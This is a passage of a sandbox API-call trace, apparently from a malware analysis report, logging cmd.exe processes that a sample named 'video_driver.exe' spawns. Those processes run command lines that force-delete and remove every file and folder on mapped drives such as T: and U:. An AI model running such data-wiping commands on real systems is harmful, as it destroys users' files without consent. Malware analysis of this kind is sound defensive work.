(_String1="del", _String2=")") returned 59 [0069.015] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0069.015] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0069.015] _wcsicmp (_String1="IF", _String2="del") returned 5 [0069.015] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0069.015] _wcsicmp (_String1="REM", _String2="del") returned 14 [0069.015] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0069.015] GetProcessHeap () returned 0x570000 [0069.015] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x58) returned 0x583230 [0069.015] GetProcessHeap () returned 0x570000 [0069.015] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x10) returned 0x57ffd8 [0069.016] GetProcessHeap () returned 0x570000 [0069.016] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x28) returned 0x583290 [0069.016] GetProcessHeap () returned 0x570000 [0069.017] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x58) returned 0x5832c0 [0069.017] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0069.017] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0069.017] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0069.017] GetProcessHeap () returned 0x570000 [0069.017] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x58) returned 0x583320 [0069.017] GetProcessHeap () returned 0x570000 [0069.017] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x44) returned 0x583380 [0069.018] GetProcessHeap () returned 0x570000 [0069.018] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x14) returned 0x5833d0 [0069.018] GetProcessHeap () returned 0x570000 [0069.018] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5833d0, Size=0x12) returned 0x5833d0 [0069.018] GetProcessHeap () returned 0x570000 [0069.018] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x5833d0) returned 0x12 [0069.018] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0069.018] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0069.018] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0069.018] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0069.018] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0069.019] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0069.019] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0069.019] GetProcessHeap () returned 0x570000 [0069.019] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x5833f0 [0069.020] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0069.021] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0069.021] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0069.021] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0069.021] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0069.021] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0069.021] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0069.021] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0069.021] GetProcessHeap () returned 0x570000 [0069.021] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x58) returned 0x583410 [0069.021] GetProcessHeap () returned 0x570000 [0069.021] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x14) returned 0x583470 [0069.021] GetProcessHeap () returned 0x570000 [0069.021] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x20) returned 0x5857e0 [0069.023] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0069.025] GetFullPathNameW (in: lpFileName="T:", nBufferLength=0x208, lpBuffer=0x1cf7a0, lpFilePart=0x1cf54c | out: lpBuffer="T:\\", lpFilePart=0x1cf54c*=0x0) returned 0x3 [0069.025] wcsncmp (_String1="T:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -8 [0069.031] GetFileAttributesW (lpFileName="T:\\" (normalized: "t:")) returned 0xffffffff [0069.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.031] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.031] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0069.031] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.031] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0069.032] SetConsoleInputExeNameW () returned 0x1 [0069.032] GetConsoleOutputCP () returned 0x1b5 [0069.032] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0069.032] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.032] exit (_Code=0) Process: id = "65" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x420a4000" os_pid = "0xaf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"U:\" del /f /s /q \"U:\" & FOR /D %p IN (\"U:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 93 os_tid = 0xb14 [0069.155] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fa7c | out: lpSystemTimeAsFileTime=0x22fa7c*(dwLowDateTime=0x7076f40, dwHighDateTime=0x1d62400)) [0069.155] GetCurrentProcessId () returned 0xaf0 [0069.155] GetCurrentThreadId () returned 0xb14 [0069.155] GetTickCount () returned 0x1148b3f [0069.155] QueryPerformanceCounter (in: lpPerformanceCount=0x22fa74 | out: lpPerformanceCount=0x22fa74*=18928854060) returned 1 [0069.157] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0069.157] __set_app_type (_Type=0x1) [0069.157] __p__fmode () returned 0x770331f4 [0069.157] __p__commode () returned 0x770331fc [0069.157] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0069.158] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0069.158] GetCurrentThreadId () returned 0xb14 [0069.158] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb14) returned 0x60 [0069.158] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.158] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0069.158] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.159] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.159] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fa0c | out: phkResult=0x22fa0c*=0x0) returned 0x2 [0069.159] VirtualQuery (in: lpAddress=0x22fa43, lpBuffer=0x22f9dc, dwLength=0x1c | out: lpBuffer=0x22f9dc*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.159] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f9dc, dwLength=0x1c | out: lpBuffer=0x22f9dc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0069.159] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f9dc, dwLength=0x1c | out: lpBuffer=0x22f9dc*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0069.159] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f9dc, dwLength=0x1c | out: lpBuffer=0x22f9dc*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.159] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f9dc, dwLength=0x1c | out: lpBuffer=0x22f9dc*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.159] GetConsoleOutputCP () returned 0x1b5 [0069.160] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0069.160] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0069.160] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.160] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0069.160] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.160] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0069.161] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.161] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.161] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.161] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0069.161] GetEnvironmentStringsW () returned 0x5620f8* [0069.161] GetProcessHeap () returned 0x550000 [0069.161] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x562bd0 [0069.162] FreeEnvironmentStringsW (penv=0x5620f8) returned 1 [0069.162] GetProcessHeap () returned 0x550000 [0069.162] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4) returned 0x561898 [0069.162] GetEnvironmentStringsW () returned 0x5620f8* [0069.162] GetProcessHeap () returned 0x550000 [0069.162] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xaca) returned 0x5636a8 [0069.162] FreeEnvironmentStringsW (penv=0x5620f8) returned 1 [0069.162] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e97c | out: phkResult=0x22e97c*=0x68) returned 0x0 [0069.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x0, lpData=0x22e988*=0x0, lpcbData=0x22e980*=0x1000) returned 0x2 [0069.162] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x4, lpData=0x22e988*=0x1, lpcbData=0x22e980*=0x4) returned 0x0 [0069.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x0, lpData=0x22e988*=0x1, lpcbData=0x22e980*=0x1000) returned 0x2 [0069.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x4, lpData=0x22e988*=0x0, lpcbData=0x22e980*=0x4) returned 0x0 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x4, lpData=0x22e988*=0x40, lpcbData=0x22e980*=0x4) returned 0x0 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x4, lpData=0x22e988*=0x40, lpcbData=0x22e980*=0x4) returned 0x0 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x0, lpData=0x22e988*=0x40, lpcbData=0x22e980*=0x1000) returned 0x2 [0069.163] RegCloseKey (hKey=0x68) returned 0x0 [0069.163] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e97c | out: phkResult=0x22e97c*=0x68) returned 0x0 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x0, lpData=0x22e988*=0x40, lpcbData=0x22e980*=0x1000) returned 0x2 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x4, lpData=0x22e988*=0x1, lpcbData=0x22e980*=0x4) returned 0x0 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x0, lpData=0x22e988*=0x1, lpcbData=0x22e980*=0x1000) returned 0x2 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x4, lpData=0x22e988*=0x0, lpcbData=0x22e980*=0x4) returned 0x0 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x4, lpData=0x22e988*=0x9, lpcbData=0x22e980*=0x4) returned 0x0 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x4, lpData=0x22e988*=0x9, lpcbData=0x22e980*=0x4) returned 0x0 [0069.163] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e984, lpData=0x22e988, lpcbData=0x22e980*=0x1000 | out: lpType=0x22e984*=0x0, lpData=0x22e988*=0x9, lpcbData=0x22e980*=0x1000) returned 0x2 [0069.164] RegCloseKey (hKey=0x68) returned 0x0 [0069.164] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6f [0069.164] srand (_Seed=0x5eb34b6f) [0069.164] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"U:\" del /f /s /q \"U:\" & FOR /D %p IN (\"U:\") DO rmdir \"%p\" /s /q" [0069.164] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"U:\" del /f /s /q \"U:\" & FOR /D %p IN (\"U:\") DO rmdir \"%p\" /s /q" [0069.164] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.164] GetProcessHeap () returned 0x550000 [0069.164] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x5620f8 [0069.456] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x562100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.456] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.456] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.456] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.456] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.456] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.456] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.456] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.456] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.456] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.456] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.457] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.457] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.457] GetProcessHeap () returned 0x550000 [0069.457] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x562bd0 | out: hHeap=0x550000) returned 1 [0069.457] GetEnvironmentStringsW () returned 0x562310* [0069.457] GetProcessHeap () returned 0x550000 [0069.457] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xae2) returned 0x564c70 [0069.457] FreeEnvironmentStringsW (penv=0x562310) returned 1 [0069.457] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.457] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.457] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.458] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.458] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.458] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.458] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.458] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.458] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.458] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.458] GetProcessHeap () returned 0x550000 [0069.458] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x5617c8 [0069.458] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f748 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.458] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x22f748, lpFilePart=0x22f744 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f744*="Desktop") returned 0x25 [0069.458] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.459] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f4c4 | out: lpFindFileData=0x22f4c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x565760 [0069.460] FindClose (in: hFindFile=0x565760 | out: hFindFile=0x565760) returned 1 [0069.460] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x22f4c4 | out: lpFindFileData=0x22f4c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x565760 [0069.460] FindClose (in: hFindFile=0x565760 | out: hFindFile=0x565760) returned 1 [0069.460] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.460] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x22f4c4 | out: lpFindFileData=0x22f4c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x565760 [0069.460] FindClose (in: hFindFile=0x565760 | out: hFindFile=0x565760) returned 1 [0069.460] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.460] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.460] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.460] GetProcessHeap () returned 0x550000 [0069.461] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564c70 | out: hHeap=0x550000) returned 1 [0069.461] GetEnvironmentStringsW () returned 0x564180* [0069.461] GetProcessHeap () returned 0x550000 [0069.461] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb36) returned 0x565fa0 [0069.461] FreeEnvironmentStringsW (penv=0x564180) returned 1 [0069.461] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.461] GetProcessHeap () returned 0x550000 [0069.461] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5617c8 | out: hHeap=0x550000) returned 1 [0069.461] GetProcessHeap () returned 0x550000 [0069.461] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400e) returned 0x566ae0 [0069.462] GetProcessHeap () returned 0x550000 [0069.462] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa0) returned 0x562e50 [0069.462] GetProcessHeap () returned 0x550000 [0069.462] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566ae0 | out: hHeap=0x550000) returned 1 [0069.462] GetConsoleOutputCP () returned 0x1b5 [0069.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0069.533] GetUserDefaultLCID () returned 0x409 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f888, cchData=128 | out: lpLCData="0") returned 2 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f888, cchData=128 | out: lpLCData="0") returned 2 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f888, cchData=128 | out: lpLCData="1") returned 2 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.558] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0069.559] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0069.559] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.560] GetProcessHeap () returned 0x550000 [0069.560] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20c) returned 0x562ef8 [0069.560] GetConsoleTitleW (in: lpConsoleTitle=0x562ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0069.574] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.574] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0069.574] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0069.574] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0069.575] GetProcessHeap () returned 0x550000 [0069.575] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x566ae0 [0069.576] GetProcessHeap () returned 0x550000 [0069.576] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4008) returned 0x56aaf8 [0069.576] GetProcessHeap () returned 0x550000 [0069.576] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1a) returned 0x5657e0 [0069.576] GetEnvironmentVariableW (in: lpName="p IN (\"U", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.576] _wcsicmp (_String1="p IN (\"U", _String2="CD") returned 13 [0069.576] _wcsicmp (_String1="p IN (\"U", _String2="ERRORLEVEL") returned 11 [0069.576] _wcsicmp (_String1="p IN (\"U", _String2="CMDEXTVERSION") returned 13 [0069.576] _wcsicmp (_String1="p IN (\"U", _String2="CMDCMDLINE") returned 13 [0069.576] _wcsicmp (_String1="p IN (\"U", _String2="DATE") returned 12 [0069.577] _wcsicmp (_String1="p IN (\"U", _String2="TIME") returned -4 [0069.577] _wcsicmp (_String1="p IN (\"U", _String2="RANDOM") returned -2 [0069.577] _wcsicmp (_String1="p IN (\"U", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.577] GetProcessHeap () returned 0x550000 [0069.577] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5657e0 | out: hHeap=0x550000) returned 1 [0069.577] GetProcessHeap () returned 0x550000 [0069.577] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56aaf8 | out: hHeap=0x550000) returned 1 [0069.577] GetProcessHeap () returned 0x550000 [0069.577] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4008) returned 0x56aaf8 [0069.577] GetProcessHeap () returned 0x550000 [0069.577] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56aaf8 | out: hHeap=0x550000) returned 1 [0069.577] GetProcessHeap () returned 0x550000 [0069.577] HeapFree (in: hHeap=0x550000, dwFlags=0x0, 